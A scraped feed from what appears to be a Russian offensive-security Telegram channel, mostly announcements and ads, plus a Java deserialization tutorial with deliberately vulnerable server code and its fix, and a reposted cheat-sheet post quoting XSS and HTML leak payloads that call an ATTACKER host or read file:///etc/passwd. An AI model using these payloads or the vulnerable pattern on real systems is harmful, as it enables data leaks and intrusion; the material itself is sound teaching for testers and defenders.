Похек
16.6K subscribers
2.19K photos
115 videos
243 files
3.16K links
All materials published on the channel are for educational and informational purposes only.

Мнение автора ≠ мнение компании, где работает автор

Чат: @poxek_chat

Реклама: @szybnev или
https://telega.in/c/poxek

РКН: https://clck.ru/3FsVhp
Download Telegram
⚡️Разыгрываем 10 книг "Сети глазами хакера" (в бумажном варианте):

•  В книге рассматриваются вопросы безопасности компьютерных сетей, что делает ее очень полезной для экспертов по сетевой безопасности, пентестерам и даже системным администраторам!

•  Всего будет 10 призовых мест, а итоги подведем уже в следующую субботу (14.09 в 19:00) при помощи бота, который рандомно выберет победителя.

Для участия нужно:

1. Быть подписанным на мой канал @poxek;
2. Подписаться на канал моих друзей @tg_infosec;
3. Нажать на кнопку «Участвовать».
 
#Конкурс
27🔥4720👍14
Forwarded from Just Security
This media is not supported in your browser
VIEW IN TELEGRAM
Опубликовали видеоролик о том, как прошла ежегодная независимая премия Pentest award 2024!

Радостные лица, толпа заряженных специалистов, и, конечно, счастливые победители с наградами в руках — настоящий праздник этичного хакинга.

Здорово было встретится в офлайне со старыми друзьями и коллегами, познакомиться с новыми людьми, обменяться знаниями и идеями, поговорить о важном, профессиональном, наболевшем.

До встречи в 2025 году 👋

Отдельная благодарность партнерам проекта: BI.ZONE Bug Bounty, VK Bug Bounty, OFFZONE и CyberED.

📺 Полное видео
🔗 Pentest award (архив)
@justsecurity
Please open Telegram to view this post
VIEW IN TELEGRAM
9👍5🔥4😁1
Десятки, сотни, а может даже тысячи багхантеров изучают дисклознутые отчёты с разных платформ.

Юра aka circuit, ведёт классный side проект: Репорты простым языком @critical_bug

Рекомендую подписаться, т.к. этот канал захватила нейросеть и ведёт канал очень даже успешно.

Там вы прочитаете о раскрытых отчётах с h1, где простыми словами расписано о чем бага, сколько вечно зелёных за неё заплатили и какая критичность. Что делать с этой информацией я думаю и так понятно)

Так что подписывайтесь @critical_bug ❤️
Please open Telegram to view this post
VIEW IN TELEGRAM
16👍7🌚2👾2🔥1😁1
Похек
1️⃣2️⃣3️⃣4️⃣5️⃣6️⃣ Открытый вебинар «Game of Offers» by Похек & Offer #вебинар #HR #найм #webinar ➡️ Завтра 05.09 с 17:00 до 19:00 в рамках проекта «Оффер в ИБ» совместно с Сергеем Зыбневым состоится открытый вебинар, на котором подробно разберем: ➡️Секреты…
Десятки, а может даже сотни безопасников, которые были на вебинаре. Только для вас! Сегодня и завтра проходят бесплатные карьерные консультации, на которых мы:

- определяем ваш запрос(куда хотите прийти и что останавливает),
- разбираем cv(резюме) с экспертами,
- обсуждаем roadmap,
- рассказываем, как получить оффер.

P.S. только для моих подписчиков, разрешают писать всем, даже тем кто не был)

Длительность 40-60 минут.
Запись: @aa_belova
😁8👍75
Прошу прощения, что давно не было постов нормальных(

В скором времени выхожу в новую компанию и будет интересный контент)

А пока можете угадать куда 😁
Кто знает, не говорим)
🌚16👍3🔥331
Forwarded from Борис_ь с ml (Boris Protoss)
Безопасность ML — фантазии, или реальность?
#иб_для_ml

Так много выходит статей про атаки на машинное обучение, фреймворки по MLSecOps возникают то тут, то там...
Но вот вопрос... "А был ли мальчик?" Есть ли действительно люди, которые пользуются методами проведения атак на искусственный интеллект? Выходит ли сегодня эта тема за рамки строгих математических кругов и лабораторных условий?
Спойлер - да.

Подробности в моей новой статьей на Хабре: https://habr.com/ru/articles/834800/
2🔥12
This media is not supported in your browser
VIEW IN TELEGRAM
UnderConf. От сообщества – для сообщества

Keynote-спикеры и докладчики крупных конференций, авторы ваших любимых телеграм-каналов про ИБ, ведущие самых известных воркшопов и легенды индустрии в одном месте – на UnderConf, 29.09

@crytech7, Сергей Голованов a.k.a. @sk1ks, @n0nvme и другие представят свои последние разработки и исследования, а Сергей Норд, локпикеры Autopsy Will Tell и хардварщики “Танец Роботов” параллельно проведут для вас топовые воркшопы

На конференции также будет развернута лаборатория Pentest Lab, где можно будет разобраться в сценариях различных атак на части сетевой инфраструктуры компании

В середине дня пройдут дебаты между Алексеем Гришиным и @i_bo0om о том, как расходятся интересы специалистов и бизнеса

🌚 Организаторы дали именной прокод для моих подписчиков: у него было 30 активаций, осталось уже меньше POHEK100underconfPROMOKODEMEGAFUN

Подробная программа уже доступна на сайте. Переходите, любуйтесь и покупайте билеты! До встречи на UnderConf 29.09 в 9:00, в Холидей Инн Сокольники по адресу г. Москва Русаковская ул., 24

Канал | Чат
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥13👍6
Forwarded from КИБЕР МЕДИА
🗣 Артем Семенов, Positive Technologies: Мы становимся свидетелями зарождения процесса безопасной разработки ML и ИИ

В эпоху стремительного развития искусственного интеллекта вопросы его безопасности выходят на первый план. Как защитить нейросети от атак, обеспечить этические рамки и разрабатывать безопасные системы с использованием ИИ?

➡️ Об этом порталу Cyber Media рассказал Артем Семенов, инженер внедрения платформы безопасной разработки Positive Technologies и автор тг-канала PWN AI.
Please open Telegram to view this post
VIEW IN TELEGRAM
😁14👍96
👾10👍31
🖥 Basic Java Deserialization (1 part)
#java #deser #deserialization

Все мы когда-нибудь дорастаем до того момента, когда к нам на проекте попадется приложение на Java и вы в судорожном фаззинге случайно натыкаетесь на что-то непонятное, а это оказывается десериализация.
Но сначала надо разобраться, что такое сериализация. Это процесс преобразования объекта или структуры данных в последовательность байтов для хранения или передачи. Это позволяет сохранить состояние объекта и позже восстановить его.

Соответственно десериализация - обратный процесс, при котором последовательность байтов преобразуется обратно в объект или структуру данных.
Вот вам пример кода:
import java.io.*;

// Класс, который мы будем сериализовать
class User implements Serializable {
private static final long serialVersionUID = 1L;
private String name;
private int age;

public User(String name, int age) {
this.name = name;
this.age = age;
}

@Override
public String toString() {
return "User{name='" + name + "', age=" + age + "}";
}
}

public class SerializationExample {
public static void main(String[] args) {
// Создаем объект для сериализации
User user = new User("Sergey", 20);

// Сериализация
try (FileOutputStream fileOut = new FileOutputStream("user.ser");
ObjectOutputStream out = new ObjectOutputStream(fileOut)) {
out.writeObject(user);
System.out.println("Объект сериализован в файл user.ser");
} catch (IOException i) {
i.printStackTrace();
}

// Десериализация
User deserializedUser = null;
try (FileInputStream fileIn = new FileInputStream("user.ser");
ObjectInputStream in = new ObjectInputStream(fileIn)) {
deserializedUser = (User) in.readObject();
} catch (IOException i) {
i.printStackTrace();
} catch (ClassNotFoundException c) {
System.out.println("Класс User не найден");
c.printStackTrace();
}

if (deserializedUser != null) {
System.out.println("Десериализованный объект: " + deserializedUser);
}
}
}


Атака десериализации - это тип атаки, при котором злоумышленник манипулирует сериализованными данными, чтобы вызвать нежелательное поведение в приложении при их десериализации.

Вот пример уязвимого кода:
import java.io.*;
import java.net.ServerSocket;
import java.net.Socket;

public class VulnerableServer {
public static void main(String[] args) {
try (ServerSocket serverSocket = new ServerSocket(1234)) {
System.out.println("Сервер запущен. Ожидание подключений...");
while (true) {
try (Socket clientSocket = serverSocket.accept();
ObjectInputStream ois = new ObjectInputStream(clientSocket.getInputStream())) {

// Уязвимый код: прямая десериализация без проверок
Object obj = ois.readObject();
System.out.println("Получен объект: " + obj);

} catch (Exception e) {
e.printStackTrace();
}
}
} catch (IOException e) {
e.printStackTrace();
}
}
}


Уязвимость в строке:
javaCopyObject obj = ois.readObject();

Здесь происходит прямая десериализация объекта без каких-либо проверок. Это позволяет злоумышленнику отправить любой сериализованный объект, который будет десериализован и выполнен в контексте сервера. Подобный код может привести к RCE.

🌚 @poxek | 📺 RuTube | 🌚 Мерч Похек
Please open Telegram to view this post
VIEW IN TELEGRAM
3🔥9👍1
🖥 Basic Java Deserialization (2 part)

Теперь поговорим о том, как защищаться от десериализации


Пример безопасного кода:
import java.io.*;
import java.net.ServerSocket;
import java.net.Socket;
import java.util.HashSet;
import java.util.Set;

public class SecureServer {
private static final Set<String> ALLOWED_CLASSES = new HashSet<>();
static {
ALLOWED_CLASSES.add("java.lang.String");
ALLOWED_CLASSES.add("java.util.ArrayList");
}

public static void main(String[] args) {
try (ServerSocket serverSocket = new ServerSocket(1234)) {
System.out.println("Сервер запущен. Ожидание подключений...");
while (true) {
try (Socket clientSocket = serverSocket.accept();
ObjectInputStream ois = new ObjectInputStream(clientSocket.getInputStream()) {
@Override
protected Class<?> resolveClass(ObjectStreamClass desc) throws IOException, ClassNotFoundException {
if (!ALLOWED_CLASSES.contains(desc.getName())) {
throw new InvalidClassException("Недопустимый класс", desc.getName());
}
return super.resolveClass(desc);
}
}) {

Object obj = ois.readObject();
System.out.println("Получен объект: " + obj);

} catch (Exception e) {
e.printStackTrace();
}
}
} catch (IOException e) {
e.printStackTrace();
}
}
}


Исправления:
➡️Создан белый список разрешенных классов (ALLOWED_CLASSES).
➡️Переопределен метод resolveClass для проверки классов перед десериализацией.
➡️Выбрасывается исключение при попытке десериализовать недопустимый класс.

Также есть другие практики по защите от десеров. К примеру Java SecurityManager, transient. С другой стороны вы можете закостылить защиту через сторонние библиотеки: SerialKiller, fastjson2, YamlBeans

➡️ В завершение хочу сказать, что если вы нашли у меня ошибку, напишите об этом, пожалуйста в комментариях)
➡️ А если вам понравилось и вы хотите продолжить изучение, то предлагаю почитать Java Deserialization Cheat Sheet

🌚 @poxek | 📺 RuTube | 🌚 Мерч Похек
Please open Telegram to view this post
VIEW IN TELEGRAM
2🔥11👍21
Forwarded from Хакер — Xakep.RU
OAuth от и до. Ищем цепочки уязвимостей при атаках на авторизацию #статьи #подписчикам

Сегодня разберем мисконфиги OAuth, которые встречаются в дикой природе и хоть сами по себе безобидны, в определенных условиях могут иметь серьезные последствия — вплоть до похека админских аккаунтов. В этой сатье я покажу, как искать такие цепочки уязвимостей.

https://xakep.ru/2024/09/13/oauth-vuln-chains/
19
❗️ Как реагировать на атаки шифровальщиков: рекомендации для CISO ❗️
#ciso

Атаки вирусов-шифровальщиков остаются серьезной угрозой информационной безопасности компаний. От них не застрахованы даже корпорации с многоуровневыми системами защиты, целыми армиями ИБ-специалистов и арсеналами СЗИ.

Если корпоративная сеть подверглась такой атаке, ИБ-службе и CISO лучше поскорее подключить команду реагирования. Однако бизнес и штатные сотрудники службы безопасности могут самостоятельно снизить риск атак программ-вымогателей, дополнительно защитить критичные файлы и облегчить расследование, если избежать инцидента все же не удалось. Как именно? Рассказывает Семен Рогачев, руководитель отдела реагирования на инциденты Бастиона.

➡️ Читать далее

🌚 @poxek | 📺 RuTube | 🌚 Мерч Похек
Please open Telegram to view this post
VIEW IN TELEGRAM
🌚52
Похек
⚡️Разыгрываем 10 книг "Сети глазами хакера" (в бумажном варианте): •  В книге рассматриваются вопросы безопасности компьютерных сетей, что делает ее очень полезной для экспертов по сетевой безопасности, пентестерам и даже системным администраторам! •  Всего…
🎉 Результаты розыгрыша:

Победители:
1. ooYa9ii (@Russian_OSlNT)
2. ALISHER (@megaumka)
3. Константин (@kr1pt0graf)
4. Babidshon (@BABIDSHON12)
5. Даниил (@by_dnk)
6. Алексей
7. Алексей (@lost_fany)
8. .Morty (@moortyyy)
9. Panteleevich (@Cracka1)
10. Anton (@TichoBrage)

Проверить результаты
🔥13👍5😁3
🔵 Инженер техподдержки? Получи оффер в YADRO всего за неделю!

У тебя есть возможность поучаствовать в One Week Offer от крупнейшей технологической компании России - лидера инженерной индустрии.

Если ты хорошо знаешь принципы серверной архитектуры и СХД и хочешь стать частью масштабных проектов:

• Пришли своё резюме и заполни форму участия до 22 сентября.
• Пройди техническое интервью.
• Получи оффер после успешного собеседования.

Скорее переходи по ссылке, оставляй заявку и стань частью команды.
Please open Telegram to view this post
VIEW IN TELEGRAM
🌚11😁3
Forwarded from HaHacking
⚙️ #заметки #offense #web


➡️Cheat sheet по безопасности HTML5; (*от создателей DOMPurify)

   🧩 cure53/H5SC 💻 🧩 html5sec.org


▪️ [ html5sec.org/test/#<1...149> ]

Для каждого из почти 150 приведённых векторов XSS атак существует демо-стенд, где можно отредактировать полезную нагрузкупонаблюдать за её поведением внутри iframe'ов с различными DTD (HTML5, HTML4, XHTML);

▪️ [ html5sec.org/test.<ext> ]

Примеры файлов, содержащих полезную нагрузку для вызова alert(1), со следующими расширениями:
asf, avi, class, css, dtd, eml, evt, gif, hlp, hta, htc, html, jar, js, json, mpeg, pdf, sct, svg, swf, vbs, vml, wbxml, xbl, xdr, xml, xsl, xxe, zip


▪️vectors.txt Словарь с примерами пейлоадов для каждого вектора XSS атаки;



➡️Список примеров HTML элементов, которые могут инициировать запросы к ресурсам; (*тоже от создателей DOMPurify)

Может быть полезен как памятка для составления полезной нагрузки для эксплуатации возможности внедрения HTML кода: для реализации OOB запросов и эксфильтрации данных;

Или как чеклист для проверки, как там поживает Ваша анонимность, ведь именно по такому принципу работают, например, пиксели-трекеры в электронных письмах🐇

   🧩 cure53/HTTPLeaks


▪️ vectors.txt Список с примерами пейлоадов; Вот, например, несколько включений из него:
...
<img dynsrc="https://leaking.via/img-dynsrc">
<img lowsrc="https://leaking.via/img-lowsrc">
<video controls><source src="https://leaking.via/video-source-src" type="video/mp4"></video>
<style>@import url(https://leaking.via/css-import-url);</style>
<svg version="1.1" xmlns="http://www.w3.org/2000/svg"><rect cursor="url(https://leaking.via/svg-cursor),auto" /></svg>
<xml src="https://leaking.via/xml-src" id="xml"></xml>
<math xlink:href="https://leaking.via/mathml-math">CLICKME</math>
...


▪️ Несколько примеров из реальной жизни:
[Chrome]  Leak user html content using Dangling Markup injection when http upgrade to https

▪️ЧТО:       <img src="http://ATTACKER/?q=
▪️КОГДА:   HTTP➡️HTTPS для http://ATTACKER
▪️ИТОГ:      утечка содержимого страницы


[Proton]  User IP address leaked on email open

▪️ЧТО:       <svg><style>circle { background-image: url(https://ATTACKER/200); }</style><circle></circle></svg>

▪️КОГДА:  при открытии письма
▪️ИТОГ:      утечка IP адреса


[macOS]  This man thought opening a txt file is fine, he thought wrong

▪️ЧТО:
ℹ️ <!DOCTYPE HTML><html><head></head><body><style>@import{ "file:///net/ATTACKER/a.css"}</style></body></html>
ℹ️ <iframedoc src="file:///etc/passwd">

▪️КОГДА:  при открытии TXT файла в TextEdit
▪️ИТОГ:      DoS (например, подтянуть /dev/zero), утечка IP адреса + содержимого локальных файлов (*объединить пейлоады)


[MS Outlook]  SMB hash hijacking & user tracking

▪️ЧТО: <v:background xmlns_v="urn:schemas-microsoft-com:vml"><br><v:fill src="<strong>its:/ATTACKER/IDontExistNew/foobar</strong>"></v:fill><br></v:background>

▪️КОГДА:  при открытии письма
▪️ИТОГ:  внешние SMB / WebDAV запросы



@HaHacking 🐇
Please open Telegram to view this post
VIEW IN TELEGRAM
2👍18🔥53
🌐🌐

Без воды, только практика.
Без цензуры, только правда.
Всё, что вы хотели узнать из первых уст.


Мы запускаем серию подкастов

Рынок уязвимостей: как устроен рынок багбаунти в России | Эпизод 1

В первом эпизоде подкаста узнаем, чем сегодня живет «мир багбаунти» в России и исследуем, как эти программы трансформируют рынок кибербезопасности.
Обсудим, как компании используют багбаунти для повышения безопасности, какие ведущие платформы и инициативы существуют в России.

В гостях у Луки Сафонова
(основатель bugbounty.ru)

Андрей Левкин (Руководитель продукта BI.ZONE Bug Bounty) и
Анатолий Иванов (Руководитель платформы Standoff Bug Bounty)

Выбирайте, где смотреть

📺 YouTube

📱 VK

🔔RUTUBE

Полезные ссылки:
Standoff 360
Positive Technologies
BI.ZONE
BI.ZONE Bug Bounty
BugBountyRu
Киберполигон
Please open Telegram to view this post
VIEW IN TELEGRAM
1🔥164👍2😁1🌚1
Forwarded from Standoff 365
Хочешь получить доступ к приватным программам на платформе Standoff Bug Bounty?

Конечно хочешь. Вот короткая инструкция, что делать:

1️⃣ Перейди по ссылке и заполни небольшой опрос.

2️⃣ Попади в список из 50 счастливчиков с самыми классными навыками и опытом. Если пройдешь отбор, мы сразу же тебе напишем.

3️⃣ Ищи баги в свеженьком закрытом скоупе.

❗️ Важное условие: у тебя не должно быть ни одной приватной программы.

Еще читаешь? Бросай это дело — анкета сама себя не заполнит.
Please open Telegram to view this post
VIEW IN TELEGRAM
😁41
раздача приваток бб на спавне
😁16
Не забывайте отдыхать :)

p.s.p.s. завтра первый рабочий день в новой компании🌚

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥3516👍2😁2👾1